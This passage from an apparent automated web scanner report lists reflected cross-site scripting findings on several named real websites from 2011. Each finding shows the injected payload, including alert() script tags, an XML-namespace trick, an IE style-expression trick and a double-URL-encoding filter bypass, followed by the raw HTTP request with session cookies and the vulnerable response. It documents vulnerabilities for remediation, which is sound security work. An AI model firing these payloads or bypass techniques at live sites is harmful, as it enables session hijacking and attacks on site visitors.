User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=xxbjjcegd5hxmw55jxay4l3b; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 63749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<350)
{
   location.href='showoffice.aspx?Show=542&5a79d'-alert(1)-'f0c22b0c26f=1&mobile=True'
}

</script>
...[SNIP]...

4.108. http://www.fulbright.com/index.cfm [eTitle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the eTitle request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94895"><script>alert(1)</script>288abb3048 was submitted in the eTitle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E94895"><script>alert(1)</script>288abb3048 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A16%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D369%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:16 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?ETITLE=Washington, D.C.94895"><script>alert(1)</script>288abb3048&FUSEACTION=correspondence.emailform&SITE_ID=299&pf=y">
...[SNIP]...

4.109. http://www.fulbright.com/index.cfm [eTitle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the eTitle request parameter is copied into the HTML document as plain text between tags. The payload 8d254<script>alert(1)</script>39610b88ceb was submitted in the eTitle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E8d254<script>alert(1)</script>39610b88ceb HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D395%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:17 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="">Washington, D.C.8d254<script>alert(1)</script>39610b88ceb</a>
...[SNIP]...

4.110. http://www.fulbright.com/index.cfm [fuseaction parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 145fe"><script>alert(1)</script>aed5c335ef1 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=news.site145fe"><script>alert(1)</script>aed5c335ef1&site_id=299 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A00%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D210%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:00 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?FUSEACTION=news.site145fe"><script>alert(1)</script>aed5c335ef1&SITE_ID=299&pf=y">
...[SNIP]...

4.111. http://www.fulbright.com/index.cfm [fuseaction parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the HTML document as plain text between tags. The payload 6f457<script>alert(1)</script>e9f570c8d27 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=news.site6f457<script>alert(1)</script>e9f570c8d27&site_id=299 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D218%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:02 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
</h2>
                                   
           I received a fuseaction called "news.site6f457<script>alert(1)</script>e9f570c8d27" I don't know what to do with!<br>
...[SNIP]...

4.112. http://www.fulbright.com/index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed44"><script>alert(1)</script>c707a822c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=news.site&site_id=299&fed44"><script>alert(1)</script>c707a822c6a=1 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A39%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D575%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?FED44"><SCRIPT>ALERT(1)</SCRIPT>C707A822C6A=1&FUSEACTION=news.site&SITE_ID=299&pf=y">
...[SNIP]...

4.113. http://www.fulbright.com/index.cfm [pf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the pf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 660d3"><script>alert(1)</script>39aa8a72e69 was submitted in the pf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?FUSEACTION=home.299&pf=y660d3"><script>alert(1)</script>39aa8a72e69 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D161%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?FUSEACTION=home.299&PF=y660d3"><script>alert(1)</script>39aa8a72e69&pf=y">
...[SNIP]...

4.114. http://www.fulbright.com/index.cfm [rss parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the rss request parameter is copied into the value of an XML tag attribute which is encapsulated in double quotation marks. The payload 1c76a"><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>2edafab2731 was submitted in the rss parameter. This input was echoed as 1c76a"><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>2edafab2731 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /index.cfm?fuseaction=news.allrss&site_id=286&rss=y1c76a"><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>2edafab2731 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A44%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D626%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:44 GMT;path=/
Content-Type: text/xml

<html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


        -
       


...[SNIP]...
<a href="/index.cfm?FUSEACTION=news.allrss&RSS=y1c76a"><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>2edafab2731&SITE_ID=286&pf=y">
...[SNIP]...

4.115. http://www.google.com/search [tch parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Issue detail

The value of the tch request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 39b16(a)5ca85e9080f was submitted in the tch parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?sclient=psy&hl=en&q=washington%2C+dc+law+office&aq=f&aqi=&aql=&oq=&pbx=1&fp=f478bdfafcb0c911&tch=139b16(a)5ca85e9080f&ech=1&psi=WP42TYixLcOclgf_yNGIAw12954497006263 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=washington%2C+dc+law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: GeNLY2f-
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Wed, 19 Jan 2011 15:17:55 GMT
Expires: -1
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 54477

MsNN-Rbk....S....Y..D.....9....X./<!doctype html><title>washington, dc law office. ...=var je=parent.google.j;var _loc='#'+location.href.substr(location.href.indexOf('?')+1);var _ss=je.ss;je.bv&&je.bv
...[SNIP]...
x3dpsy\\x26amp;hl\\x3den\\x26amp;q\\x3dwashington%2C+dc+law+office\\x26amp;aq\\x3df\\x26amp;aqi\\x3d\\x26amp;aql\\x3d\\x26amp;oq\\x3d\\x26amp;pbx\\x3d1\\x26amp;fp\\x3df478bdfafcb0c911\\x26amp;tch\\x3d139b16(a)5ca85e9080f\\x26amp;ech\\x3d1\\x26amp;psi\\x3dWP42TYixLcOclgf_yNGIAw12954497006263\x27)});});r();var l\x3dwindow.location.hashC:.N.Q\x27#\x27)):\x27#\x27;if(l\x3d\x3d\x27#\x27\x26\x26google.defre){google.defre\x3
...[SNIP]...

4.116. http://www.info.com/washington%20dc%20law%20firms [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.info.com
Path:   /washington%20dc%20law%20firms

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ee2d%253cscript%253ealert%25281%2529%253c%252fscript%253e72356283334 was submitted in the REST URL parameter 1. This input was echoed as 2ee2d<script>alert(1)</script>72356283334 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /washington%20dc%20law%20firms2ee2d%253cscript%253ealert%25281%2529%253c%252fscript%253e72356283334 HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.219CKMLO; path=/
Date: Wed, 19 Jan 2011 16:48:16 GMT
Server: Apache
Set-Cookie: b=newwindow+1+dpcollation_web+1+lang+0+familyfilter+1+bold+1+msRecentSearches+off+autocorrect+0+domain+infocom+ts+1295455696+last_cmp++engineset; expires=Sun, 18-Jan-2037 23:56:12 GMT; path=/; domain=.info.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39615

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - washington dc law firms2ee2d%3cscript%3ealert%281%29%3c%2fscript%3e72356283334 - www.Info.com</title><l
...[SNIP]...
<a href="http://Info.com/searchw?qkw=washington+dc+law+firms+2ee2d%3Cscript%3Ealert%281%29%3C%2Fscript%3E72356283334&r_cop=spell" style="text-decoration:underline">washington dc law firms 2ee2d<script>alert(1)</script>72356283334</a>
...[SNIP]...

4.117. http://www.jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jonesdaydiversity.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d512'-alert(1)-'f727d73fb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?2d512'-alert(1)-'f727d73fb9=1 HTTP/1.1
Host: www.jonesdaydiversity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:51:57 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000610
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A37
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=6605501; path=/
Set-Cookie: SiteId=1383; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=kqd4kregj1lis3uz4nrgoa55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9989
Set-Cookie: NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63f45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title id="ctl00_htmlTitle">Jones Day Diversity</title>
<link rel="stylesheet"
...[SNIP]...
<![CDATA[
var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/Home.aspx?2d512'-alert(1)-'f727d73fb9=1';//]]>
...[SNIP]...

4.118. http://www.learnestateplanning.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.learnestateplanning.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faa91"><script>alert(1)</script>3a8a42ea6f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?faa91"><script>alert(1)</script>3a8a42ea6f9=1 HTTP/1.1
Host: www.learnestateplanning.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 19 Jan 2011 16:52:08 GMT
Content-type: text/html
Connection: close

<html><head><title>LEARNESTATEPLANNING.COM</title><meta name="keywords" content=""</head><frameset rows="100%", *" border="0" frameborder="0"><frame src="http://sites.google.com/a/mayberrylawfirm.com/learnestateplanning/?faa91"><script>alert(1)</script>3a8a42ea6f9=1" name="LEARNESTATEPLANNING.COM">
...[SNIP]...

4.119. http://www.local.com/results.aspx [CID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the CID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7005"style%3d"x%3aexpression(alert(1))"e433a090613 was submitted in the CID parameter. This input was echoed as b7005"style="x:expression(alert(1))"e433a090613 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=law+offices&CID=2531/x22b7005"style%3d"x%3aexpression(alert(1))"e433a090613 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 140321
Date: Wed, 19 Jan 2011 16:55:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=2kp5nz3tik1sq1fna4qmow45; path=/; HttpOnly
Set-Cookie: localcom=cid=2531/x22b7005"style="x:expression(alert(1))"e433a090613&loc=Dallas%2c+TX&kw=law+offices&uid=dc362bce-4849-438a-bd9e-20b0269c8fd9&expdate=634336161100159854&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22b7005%22style%253d%22x%253aexpression(alert(1))%22e433a090613&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Fri, 18-Feb-2011 16:55:10 GMT; path=/
Set-Cookie: localcom_s=cid=2531/x22b7005"style="x:expression(alert(1))"e433a090613&exp=634310259100159854; domain=local.com; expires=Wed, 19-Jan-2011 17:25:10 GMT; path=/
Content-Length: 140321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX law offices | Find
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=law offices&CID=2531/x22b7005"style="x:expression(alert(1))"e433a090613&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

4.120. http://www.local.com/results.aspx [CID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the CID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abc1a"%3bbdb542a73ab was submitted in the CID parameter. This input was echoed as abc1a";bdb542a73ab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /results.aspx?keyword=law+offices&CID=2531/x22abc1a"%3bbdb542a73ab HTTP/1.1
